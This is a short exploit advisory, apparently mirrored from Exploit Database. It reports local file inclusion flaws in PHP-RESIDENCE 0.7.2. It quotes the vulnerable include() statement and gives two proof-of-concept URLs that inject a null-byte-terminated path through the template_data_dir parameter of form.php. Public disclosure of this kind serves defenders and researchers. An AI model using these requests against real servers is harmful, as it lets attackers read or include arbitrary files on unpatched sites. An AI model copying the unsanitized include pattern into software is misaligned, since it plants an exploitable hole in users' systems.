PHP-RESIDENCE 0.7.2 – Multiple Local File Inclusions

• Exploit Database
• 100 阅读

• 作者： cr4wl3r
  日期： 2010-01-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11156/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  \#&apos;#/ (-.-) --------------------oOO---(_)---OOo------------------- | PHP-RESIDENCE <= 0.7.2 Multiple LFI Vulnerability| |(works only with magic_quotes_gpc = off)| ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Download: http://www.digitaldruid.net/download/php-residence_0.7.2.zip [!] Date: 30.12.2009 [!] Remote: yes   [!] Code :   include("./includes/templates/$template_data_dir/phrases.php");   [!] PoC:   [PHP-RESIDENCE_path]/includes/templates/cal/form.php?template_data_dir=[LFI%00]         [!] Code :   include("./includes/templates/$template_data_dir/phrases.php");   [!] PoC:   [PHP-RESIDENCE_path]/includes/templates/rat/form.php?template_data_dir=[LFI%00]